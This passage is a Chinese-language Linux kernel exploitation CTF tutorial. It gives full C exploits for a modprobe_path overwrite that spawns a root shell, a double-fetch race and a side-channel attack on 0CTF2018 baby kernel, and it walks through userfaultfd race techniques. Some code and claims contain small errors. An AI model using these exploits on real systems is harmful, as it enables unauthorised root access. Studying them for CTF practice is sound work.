1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 #define __PAGE_OFFSET page_offset_base #define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET) #define __va(x) ((void *)((unsigned long)(x)+PAGE_OFFSET)) trampoline_header = (struct trampoline_header *) __va(real_mode_header->trampoline_header); ... trampoline_header->start = (u64) secondary_startup_64; [......] .text:FFFFFFFF81000030 ; void secondary_startup_64 () [......] pwndbg>x/40gx (0xffff9f5d40000000 +0x9d000 -0x20 0xffff9f5d4009cfe0 : 0X0000000000000000 0X0000000000000000 0xffff9f5d4009cff0 : 0X0000000000000000 0X0000000005c0c067 0xffff9f5d4009d000 : 0xffffffff97c00030 0X0000000000000901 0xffff9f5d4009d010 : 0X00000000000006b0 0X0000000000000000 0xffff9f5d4009d020 : 0X0000000000000000 0X0000000000000000
至于 page_offset_base 可以通过 object 上的 free list 泄露的堆地址与上 0xFFFFFFFFF0000000 获取。不同版本可查看vmmap。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/io.h> size_t modprobe_path = 0xFFFFFFFF82444700 ;void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } struct Data { size_t *buf; u_int32_t offset; u_int32_t size; }; void alloc_buf (int fd, struct Data *data) { ioctl(fd, 0x1111111 , data); } void write_buf (int fd, struct Data *data) { ioctl(fd, 0x6666666 , data); } void read_buf (int fd, struct Data *data) { ioctl(fd, 0x7777777 , data); } int main () { int xkmod_fd[5 ]; for (int i = 0 ; i < 5 ; i++) { xkmod_fd[i] = open("/dev/xkmod" , O_RDONLY); if (xkmod_fd[i] < 0 ) { printf ("[-] %d Failed to open xkmod." , i); exit (-1 ); } } struct Data data = {malloc (0x1000 ), 0 , 0x50 }; alloc_buf(xkmod_fd[0 ], &data); close(xkmod_fd[0 ]); read_buf(xkmod_fd[1 ], &data); qword_dump("buf" , data.buf, 0x50 ); size_t page_offset_base = data.buf[0 ] & 0xFFFFFFFFF0000000 ; printf ("[+] page_offset_base: %p\n" , page_offset_base); data.buf[0 ] = page_offset_base + 0x9d000 - 0x10 ; write_buf(xkmod_fd[1 ], &data); alloc_buf(xkmod_fd[1 ], &data); alloc_buf(xkmod_fd[1 ], &data); data.size = 0x50 ; read_buf(xkmod_fd[1 ], &data); qword_dump("buf" , data.buf, 0x50 ); size_t kernel_offset = data.buf[2 ] - 0xffffffff81000030 ; printf ("kernel offset: %p\n" , kernel_offset); modprobe_path += kernel_offset; close(xkmod_fd[1 ]); data.buf[0 ] = modprobe_path - 0x10 ; write_buf(xkmod_fd[2 ], &data); alloc_buf(xkmod_fd[2 ], &data); alloc_buf(xkmod_fd[2 ], &data); strcpy ((char *) &data.buf[2 ], "/home/shell.sh" ); write_buf(xkmod_fd[2 ], &data); system("echo '#!/bin/sh' >> /home/shell.sh" ); system("echo 'setsid cttyhack setuidgid 0 sh' >> /home/shell.sh" ); system("chmod +x /home/shell.sh" ); system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake" ); system("chmod +x /home/fake" ); system("/home/fake" ); return 0 ; }
WDB2024 PWN03 利用思路 一道非常简单的内核题,基本上和RWCTF2022 Digging into kernel 1 & 2是一样的,这道题大家拿去练手即可,建议大家自行分析题目,我只把我的exp贴在下面,但是建议大家自己写一个exp。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 #ifndef _GNU_SOURCE #define _GNU_SOURCE #endif #include <asm/ldt.h> #include <assert.h> #include <ctype.h> #include <errno.h> #include <fcntl.h> #include <linux/keyctl.h> #include <linux/userfaultfd.h> #include <poll.h> #include <pthread.h> #include <sched.h> #include <semaphore.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/prctl.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/xattr.h> #include <unistd.h> #include <sys/io.h> size_t modprobe_path = 0xFFFFFFFF81E58B80 ;void qword_dump (char *desc, void *addr, int len) { uint64_t *buf64 = (uint64_t *) addr; uint8_t *buf8 = (uint8_t *) addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } void alloc_buf (int fd, int size) { printf ("[+] kmalloc %d\n" , size); ioctl(fd, 0x0 , size); } void free_buf (int fd) { printf ("[+] kfree\n" ); ioctl(fd, 0x1 , 0 ); } void read_buf (int fd, size_t * buf, int size) { printf ("[+] copy_to_user %d\n" , size); read(fd, buf, size); qword_dump("read_buf" , buf, size); } void write_buf (int fd, size_t * buf, int size) { printf ("[+] copy_from_user %d\n" , size); qword_dump("write_buf" , buf, size); write(fd, buf, size); } int main () { size_t * buf = malloc (0x500 ); int easy_fd; easy_fd = open("/dev/easy" , O_RDWR); alloc_buf(easy_fd, 0xa8 ); free_buf(easy_fd); read_buf(easy_fd, buf, 0xa8 ); size_t page_offset_base = buf[0 ] & 0xFFFFFFFFF0000000 ; printf ("[*] page_offset_base %p\n" , page_offset_base); buf[0 ] = page_offset_base + 0x9d000 - 0x10 ; write_buf(easy_fd, buf, 0x8 ); alloc_buf(easy_fd, 0xa8 ); alloc_buf(easy_fd, 0xa8 ); read_buf(easy_fd, buf, 0xa8 ); size_t kernel_offset = buf[2 ] - 0xFFFFFFFF81000110 ; printf ("[*] kernel offset: %p\n" , kernel_offset); modprobe_path += kernel_offset; buf[0 ] = modprobe_path - 0x20 ; alloc_buf(easy_fd, 0xa8 ); free_buf(easy_fd); write_buf(easy_fd, buf, 0x8 ); alloc_buf(easy_fd, 0xa8 ); alloc_buf(easy_fd, 0xa8 ); read_buf(easy_fd, buf, 0x20 ); strcpy ((char *) &buf[4 ], "/tmp/shell.sh\x00" ); write_buf(easy_fd, buf, 0x30 ); system("echo '#!/bin/sh' >> /tmp/shell.sh" ); system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh" ); system("chmod +x /shell.sh" ); system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake" ); system("chmod +x /tmp/fake" ); system("/tmp/fake" ); return 0 ; }
内核条件竞争 通常情况下在用户态下的 pwn 当中我们只有一个独立运行的主线程,并不存在所谓条件竞争的情况,但在 kernel pwn 当中由攻击者负责编写用户态程序,可以很轻易地启动多个线程同时运行 ,从而轻易地产生条件竞争
double fetch 利用思路 double fetch 直译就是 取值两次,直接理解就是在一次操作当中要两次(或是多次)重新获取某个对象的值 ,可能出现在下面这种情况当中:
有一大段数据要从用户空间传给内核空间,但是直接传送整块数据会造成较大的开销,故选择只向内核传送一个指向用户地址空间的指针
在后续的操作当中内核需要多次 通过该指针获取到用户空间的数据
一个典型的 Double Fetch 漏洞原理如下图所示,一个用户态线程准备数据并通过系统调用进入内核,该数据在内核中有两次被取用,内核第一次取用数据进行安全检查(如缓冲区大小、指针可用性等),当检查通过后内核第二次取用数据进行实际处理。而在两次取用数据之间,另一个用户态线程可创造条件竞争,对已通过检查的用户态数据进行篡改,在真实使用时造成访问越界或缓冲区溢出,最终导致内核崩溃或权限提升。
不难看出,若是整个操作流程过长,则用户进程便有机会修改这一块数据,使得内核在两次访问这块空间时所获得的数据不一致,从而使得内核进入不同的执行流程 ,用户进程甚至可以直接开新的线程进行竞争来实现这个效果
通过在 first fetch 与 second fetch 之间的空挡修改数据从而改变内核执行流的利用手法便被称之为double fetch。
0CTF2018 Final baby kernel 题目分析 start.sh
1 2 3 4 5 6 7 8 9 10 11 12 13 #!/bin/sh qemu-system-x86_64 \ -m 256M -smp 2,cores=2,threads=1 \ -kernel ./vmlinuz-4.15.0-22-generic \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -cpu qemu64 \ -monitor /dev/null \ -netdev user,id =t0, -device e1000,netdev=t0,id =nic0 \ -nographic \ -s
逆向分析
其中参数 0x6666 可以获得 flag 在内核中的地址,参数 0x1337 则会将我们传入的 flag 与真正的 flag 进行对比,若正确则会将 flag 打印出来,并且题目没有禁用dmesg。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 signed __int64 __fastcall baby_ioctl (__int64 a1, attr *a2) { attr *v2; int i; attr *v5; _fentry__(a1, a2); v5 = v2; if ( (_DWORD)a2 == 0x6666 ) { printk("Your flag is at %px! But I don't think you know it's content\n" , flag); return 0LL ; } else if ( (_DWORD)a2 == 0x1337 && !_chk_range_not_ok( (__int64)v2, 0x10 LL, *(_QWORD *)(__readgsqword((unsigned int )¤t_task) + 0x1358 )) && !_chk_range_not_ok( v5->flag_str, SLODWORD(v5->flag_len), *(_QWORD *)(__readgsqword((unsigned int )¤t_task) + 0x1358 )) && LODWORD(v5->flag_len) == strlen (flag) ) { for ( i = 0 ; i < strlen (flag); ++i ) { if ( *(_BYTE *)(v5->flag_str + i) != flag[i] ) return 0x16 LL; } printk("Looks like the flag is not a secret anymore. So here is it %s\n" , flag); return 0LL ; } else { return 0xE LL; } }
简单分析可知我们应当传入如下结构体,其中 flag_len 参数与 flag 的长度对比,在 .ko 文件中 flag 的长度为 33。
1 2 3 4 00000000 attr struc ; (sizeof =0x10 , mappedto_3)00000000 flag_str dq ?00000008 flag_len dq ?00000010 attr ends
在 0x1337 功能当中还会通过 _chk_range_not_ok() 函数检查我们传入的地址范围是否合法,add 指令会影响 CF(产生进位/借位)和 OF(两数最高位相同,结果最高位改变)标志位,v3获得的就是两数相加的 CF 位,这里一般为0(除非你传入 0xffffffffffffffff 附近的数),所以我们直接看另一个判断:range 是否小于 v4。
range 为 current_task 的地址加上 0x1358 处所存地址,大概是 task_struct->thread->fpu->state 这个联合体内的某个位置上存的一个值,而 v4 则是我们传入的 flag 最后一个字节的地址,即我们传入的 flag 的地址不能够大于这个值且 root 调一下我们可以发现这个值为 0x7ffffffff000。这个位置刚好是用户地址空间的栈底,即我们传入的 flag 的地址不能为用户地址空间外的地址。
1 2 3 4 5 6 7 8 9 bool __fastcall _chk_range_not_ok(__int64 flag_str, __int64 flag_len, unsigned __int64 range){ bool v3; unsigned __int64 v4; v3 = __CFADD__(flag_len, flag_str); v4 = flag_len + flag_str; return v3 || range < v4; }
利用思路 虽然 flag 存储的地址已知,但是位于内核地址空间当中,我们将之直接传给模块并不能通过验证,那么这里就考虑 double fetch——先传入一个用户地址空间上的合法地址,开另一个线程进行竞争不断修改其为内核空间 flag 的地址,只要有一次命中我们便能获得 flag。
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <pthread.h> #include <string.h> pthread_t compete_thread;void * real_addr;char buf[0x20 ] = "arttnba3" ;int competetion_times = 0x1000 , status = 1 ;struct { char * flag_addr; int flag_len; }flag = {.flag_addr = buf, .flag_len = 33 }; void * competetionThread (void ) { while (status) { for (int i = 0 ; i < competetion_times; i++) flag.flag_addr = real_addr; } } int main (int argc, char ** argv, char ** envp) { int fd, result_fd, addr_fd; char * temp, *flag_addr_addr; fd = open("/dev/baby" , O_RDWR); ioctl(fd, 0x6666 ); system("dmesg | grep flag > addr.txt" ); temp = (char *) malloc (0x1000 ); addr_fd = open("./addr.txt" , O_RDONLY); temp[read(addr_fd, temp, 0x100 )] = '\0' ; flag_addr_addr = strstr (temp, "Your flag is at " ) + strlen ("Your flag is at " ); real_addr = strtoull(flag_addr_addr, flag_addr_addr + 16 , 16 ); printf ("[+] flag addr: %llx" , real_addr); pthread_create(&compete_thread, NULL , competetionThread, NULL ); while (status) { for (int i = 0 ; i < competetion_times; i++) { flag.flag_addr = buf; ioctl(fd, 0x1337 , &flag); } system("dmesg | grep flag > result.txt" ); result_fd = open("./result.txt" , O_RDONLY); read(result_fd, temp, 0x1000 ); if (strstr (temp, "flag{" )) status = 0 ; } pthread_cancel(compete_thread); printf ("[+] competetion end!" ); system("dmesg | grep flag" ); return 0 ; }
侧信道攻击 利用思路 在进行比对时并没有检验 flag 地址的合法性,考虑如下内存布局:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
我们将 flag 放在通过 mmap 分配而来的内存页的末尾,其最后一个字符 X 是我们将要爆破的未知字符
对于待比对字符 X 而言,若是比对失败则 ioctl 会直接返回,若是比对成功则指针移动到下一张内存页中进行解引用,此时将会直接造成 kernel panic
由于 flag 被硬编码在 .ko 文件中,故通过是否造成 kernel panic 可以逐字符爆破 flag 内容
ASCII 可见字符 95 个,flag 长度 33,开头 flag{ 末尾 } 减去6个字符,最多只需要爆破 26 * 95 = 2470 次便能够获得 flag
比较需要耐心(因为打远程传文件很麻烦),这里附上一个比较方便的 exp,不用每次打都重新编译一次,只需要将 flag 作为参数传进去就行了:
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> struct { char * flag_addr; int flag_len; }flag = { .flag_len = 33 }; int main (int argc, char ** argv, char ** envp) { int fd, flag_len; char * buf, *flag_addr; if (argc < 2 ) { puts ("usage: ./exp flag" ); exit (-1 ); } flag_len = strlen (argv[1 ]); fd = open("/dev/baby" , O_RDWR); buf = (char *) mmap(NULL , 0x1000 , PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1 , 0 ); flag_addr = buf + 0x1000 - flag_len; memcpy (flag_addr, argv[1 ], flag_len); flag.flag_addr = flag_addr; ioctl(fd, 0x1337 , &flag); return 0 ; }
userfaultfd 利用思路 严格意义而言 userfaultfd 并非是一种利用手法,而是 Linux 的一个系统调用 ,简单来说,通过 userfaultfd 这种机制,用户可以通过自定义的 page fault handler 在用户态处理缺页异常
下面的这张图很好地体现了 userfaultfd 的整个流程:
要使用 userfaultfd 系统调用,我们首先要注册一个 userfaultfd,通过 ioctl 监视一块内存区域,同时还需要专门启动一个用以进行轮询的线程 uffd monitor,该线程会通过 poll() 函数不断轮询直到出现缺页异常
当有一个线程在这块内存区域内触发缺页异常时(比如说第一次访问一个匿名页),该线程(称之为 faulting 线程)进入到内核中处理缺页异常
内核会调用 handle_userfault() 交由 userfaultfd 处理
随后 faulting 线程进入堵塞状态,同时将一个 uffd_msg 发送给 monitor 线程,等待其处理结束
monitor 线程调用通过 ioctl 处理缺页异常,有如下选项:
UFFDIO_COPY:将用户自定义数据拷贝到 faulting page 上
UFFDIO_ZEROPAGE :将 faulting page 置0
UFFDIO_WAKE:用于配合上面两项中 UFFDIO_COPY_MODE_DONTWAKE 和 UFFDIO_ZEROPAGE_MODE_DONTWAKE 模式实现批量填充
在处理结束后 monitor 线程发送信号唤醒 faulting 线程继续工作
以上便是 userfaultfd 这个机制的整个流程,该机制最初被设计来用以进行虚拟机/进程的迁移等用途,但是通过这个机制我们可以控制进程执行流程的先后顺序,从而使得对条件竞争的利用成功率大幅提高
考虑在内核模块当中有一个菜单堆的情况,其中的操作都没有加锁,那么便存在条件竞争的可能,考虑如下竞争情况:
此时线程1便有可能编辑到被释放的堆块 ,若是此时恰好我们又将这个堆块申请到了合适的位置(比如说 tty_operations),那么我们便可以完成对该堆块的重写,从而进行下一步利用
但是毫无疑问的是,若是直接开两个线程进行竞争,命中的几率是比较低的,我们也很难判断是否命中
但假如线程1使用诸如 copy_from_user 、copy_to_user 等方法在用户空间与内核空间之间拷贝数据,那么我们便可以:
先用 mmap 分一块匿名内存,为其注册 userfaultfd,由于我们是使用 mmap 分配的匿名内存,此时该块内存并没有实际分配物理内存页
线程1在内核中在这块内存与内核对象间进行数据拷贝,在访问注册了 userfaultfd 内存时便会触发缺页异常,陷入阻塞,控制权转交 userfaultfd 的 uffd monitor 线程
在 uffd monitor 线程中我们便能对线程1正在操作的内核对象进行恶意操作 (例如覆写线程1正在读写的内核对象,或是将线程1正在读写的内核对象释放掉后再分配到我们想要的地方)
此时再让线程1继续执行,线程 1 便会向我们想要写入的目标写入特定数据/从我们想要读取的目标读取特定数据 了
由此,我们便成功利用 userfaultfd 完成了对条件竞争漏洞的利用,这项技术的存在使得条件竞争的命中率大幅提高
以下代码参考自 Linux man page,略有改动
首先定义接下来需要用到的一些数据结构
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 #include <sys/types.h> #include <stdio.h> #include <linux/userfaultfd.h> #include <pthread.h> #include <errno.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <poll.h> #include <string.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <poll.h> void errExit (char * msg) { puts (msg); exit (-1 ); } long uffd; char *addr; unsigned long len; pthread_t thr; struct uffdio_api uffdio_api ;struct uffdio_register uffdio_register ;
首先通过 userfaultfd 系统调用注册一个 userfaultfd,其中 O_CLOEXEC 和 O_NONBLOCK 和 open 的 flags 相同,笔者个人认为这里可以理解为我们创建了一个虚拟设备 userfault
这里用 mmap 分一个匿名页用作后续被监视的区域
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1 ) errExit("userfaultfd" ); uffdio_api.api = UFFD_API; uffdio_api.features = 0 ; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1 ) errExit("ioctl-UFFDIO_API" ); len = 0x1000 ; addr = (char *) mmap(NULL , len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (addr == MAP_FAILED) errExit("mmap" );
为这块内存区域注册 userfaultfd
1 2 3 4 5 6 7 8 9 /* Register the memory range of the mapping we just created for handling by the userfaultfd object. In mode, we request to track missing pages (i.e., pages that have not yet been faulted in). */ uffdio_register.range.start = (unsigned long) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) errExit("ioctl-UFFDIO_REGISTER");
启动 monitor 轮询线程,整个 userfaultfd 的启动流程就结束了,接下来便是等待缺页异常的过程
1 2 3 4 5 /* Create a thread that will process the userfaultfd events */ int s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd); if (s != 0) { errExit("pthread_create"); }
monitor 轮询线程应当定义如下形式,这里给出的是 UFFD_COPY,即将自定义数据拷贝到 faulting page 上:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 static int page_size;static void *fault_handler_thread (void *arg) { static struct uffd_msg msg ; static int fault_cnt = 0 ; long uffd; static char *page = NULL ; struct uffdio_copy uffdio_copy ; ssize_t nread; page_size = sysconf(_SC_PAGE_SIZE); uffd = (long ) arg; if (page == NULL ) { page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (page == MAP_FAILED) errExit("mmap" ); } for (;;) { struct pollfd pollfd ; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1 , -1 ); if (nready == -1 ) errExit("poll" ); printf ("\nfault_handler_thread():\n" ); printf (" poll() returns: nready = %d; " "POLLIN = %d; POLLERR = %d\n" , nready, (pollfd.revents & POLLIN) != 0 , (pollfd.revents & POLLERR) != 0 ); nread = read(uffd, &msg, sizeof (msg)); if (nread == 0 ) { printf ("EOF on userfaultfd!\n" ); exit (EXIT_FAILURE); } if (nread == -1 ) errExit("read" ); if (msg.event != UFFD_EVENT_PAGEFAULT) { fprintf (stderr , "Unexpected event on userfaultfd\n" ); exit (EXIT_FAILURE); } printf (" UFFD_EVENT_PAGEFAULT event: " ); printf ("flags = %llx; " , msg.arg.pagefault.flags); printf ("address = %llx\n" , msg.arg.pagefault.address); memset (page, 'A' + fault_cnt % 20 , page_size); fault_cnt++; uffdio_copy.src = (unsigned long ) page; uffdio_copy.dst = (unsigned long ) msg.arg.pagefault.address & ~(page_size - 1 ); uffdio_copy.len = page_size; uffdio_copy.mode = 0 ; uffdio_copy.copy = 0 ; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1 ) errExit("ioctl-UFFDIO_COPY" ); printf ("(uffdio_copy.copy returned %lld)\n" , uffdio_copy.copy); } }
有人可能注意到了 uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(page_size - 1); 这个奇怪的句子,在这里作用是将触发缺页异常的地址按页对齐 作为后续拷贝的起始地址
比如说触发的地址可能是 0xdeadbeef,直接从这里开始拷贝一整页的数据就拷歪了,应当从 0xdeadb000 开始拷贝(假设页大小 0x1000)
例程
测试例程如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 #include <sys/types.h> #include <stdio.h> #include <linux/userfaultfd.h> #include <pthread.h> #include <errno.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <poll.h> #include <string.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/ioctl.h> #include <poll.h> static int page_size;void errExit (char * msg) { printf ("[x] Error at: %s\n" , msg); exit (-1 ); } static void *fault_handler_thread (void *arg) { static struct uffd_msg msg ; static int fault_cnt = 0 ; long uffd; static char *page = NULL ; struct uffdio_copy uffdio_copy ; ssize_t nread; uffd = (long ) arg; if (page == NULL ) { page = mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (page == MAP_FAILED) errExit("mmap" ); } for (;;) { struct pollfd pollfd ; int nready; pollfd.fd = uffd; pollfd.events = POLLIN; nready = poll(&pollfd, 1 , -1 ); if (nready == -1 ) errExit("poll" ); printf ("\nfault_handler_thread():\n" ); printf (" poll() returns: nready = %d; " "POLLIN = %d; POLLERR = %d\n" , nready, (pollfd.revents & POLLIN) != 0 , (pollfd.revents & POLLERR) != 0 ); nread = read(uffd, &msg, sizeof (msg)); if (nread == 0 ) { printf ("EOF on userfaultfd!\n" ); exit (EXIT_FAILURE); } if (nread == -1 ) errExit("read" ); if (msg.event != UFFD_EVENT_PAGEFAULT) { fprintf (stderr , "Unexpected event on userfaultfd\n" ); exit (EXIT_FAILURE); } printf (" UFFD_EVENT_PAGEFAULT event: " ); printf ("flags = %llx; " , msg.arg.pagefault.flags); printf ("address = %llx\n" , msg.arg.pagefault.address); memset (page, 'A' + fault_cnt % 20 , page_size); fault_cnt++; uffdio_copy.src = (unsigned long ) page; uffdio_copy.dst = (unsigned long ) msg.arg.pagefault.address & ~(page_size - 1 ); uffdio_copy.len = page_size; uffdio_copy.mode = 0 ; uffdio_copy.copy = 0 ; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1 ) errExit("ioctl-UFFDIO_COPY" ); printf (" (uffdio_copy.copy returned %lld)\n" , uffdio_copy.copy); } } int main (int argc, char ** argv, char ** envp) { long uffd; char *addr; unsigned long len; pthread_t thr; struct uffdio_api uffdio_api ; struct uffdio_register uffdio_register ; page_size = sysconf(_SC_PAGE_SIZE); uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if (uffd == -1 ) errExit("userfaultfd" ); uffdio_api.api = UFFD_API; uffdio_api.features = 0 ; if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1 ) errExit("ioctl-UFFDIO_API" ); len = 0x1000 ; addr = (char *) mmap(NULL , page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1 , 0 ); if (addr == MAP_FAILED) errExit("mmap" ); uffdio_register.range.start = (unsigned long ) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1 ) errExit("ioctl-UFFDIO_REGISTER" ); int s = pthread_create(&thr, NULL , fault_handler_thread, (void *) uffd); if (s != 0 ) errExit("pthread_create" ); void * ptr = (void *) *(unsigned long long *) addr; printf ("Get data: %p\n" , ptr); return 0 ; }
起个虚拟机跑一下,我们可以看到在我们监视的匿名页内成功地被我们写入了想要的数据
新版本内核对抗 需要说明的是,自从 5.11 版本起内核 fs/userfaultfd.c 中全局变量 sysctl_unprivileged_userfaultfd 初始化为 1,这意味着只有 root 权限用户才能使用 userfaultfd 。
这是因为在较新版本的内核中修改了变量 sysctl_unprivileged_userfaultfd 的值:
来自 linux-5.11 源码fs/userfaultfd.c:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 int sysctl_unprivileged_userfaultfd __read_mostly;SYSCALL_DEFINE1(userfaultfd, int , flags) { struct userfaultfd_ctx *ctx ; int fd; if (!sysctl_unprivileged_userfaultfd && (flags & UFFD_USER_MODE_ONLY) == 0 && !capable(CAP_SYS_PTRACE)) { printk_once(KERN_WARNING "uffd: Set unprivileged_userfaultfd " "sysctl knob to 1 if kernel faults must be handled " "without obtaining CAP_SYS_PTRACE capability\n" ); return -EPERM; }
来自 linux-5.4 源码fs/userfaultfd.c:
1 2 int sysctl_unprivileged_userfaultfd __read_mostly = 1 ;
在之前的版本当中 sysctl_unprivileged_userfaultfd 这一变量被初始化为 1,而在较新版本的内核当中这一变量并没有被赋予初始值,编译器会将其放在 bss 段,默认值为 0
这意味着在较新版本内核中只有 root 权限才能使用 userfaultfd ,这或许意味着刚刚进入大众视野的 userfaultfd 可能又将逐渐淡出大众视野,但不可否认的是,userfaultfd 确乎为我们在 Linux kernel 中的条件竞争利用提供了一个全新的思路与一种极其稳定的利用手法。
CTF 中的 userfaultfd 板子 userfaultfd 的整个操作流程比较繁琐,故笔者现给出如下板子:
